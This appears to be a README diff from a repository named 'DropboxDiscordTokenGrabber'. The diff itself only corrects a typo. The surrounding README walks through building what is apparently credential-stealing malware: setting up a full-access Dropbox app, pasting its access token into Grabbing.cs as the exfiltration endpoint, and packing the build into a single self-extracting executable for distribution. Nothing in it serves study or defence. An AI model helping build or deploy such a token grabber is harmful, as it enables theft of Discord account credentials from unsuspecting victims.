synergyworks13/DropboxDiscordTokenGrabber/README.md

  - Go to dropbox.com/developers and create a new app.
  - Chose Dropbox API and give it full access.
 You can name it to anything you like.
  - Generate a new Dropbox access token and paste it in the project to Grabbing.cs line 25. (string DropboxToken)
- - Save the solution, exit from Visual Studion, delete the bin and obj files, restart and build the solution
+ - Save the solution, exit from Visual Studio, delete the bin and obj files, restart and build the solution
  - Build your app and you are ready. (**The generated .dll files with the executable are necessary.
 You may want to make a self extractor executable, if you want it to be only an .exe file.
 You may also want to "Restore NuGet packages." in Visual Studio.**)

 **Huge thanks to:**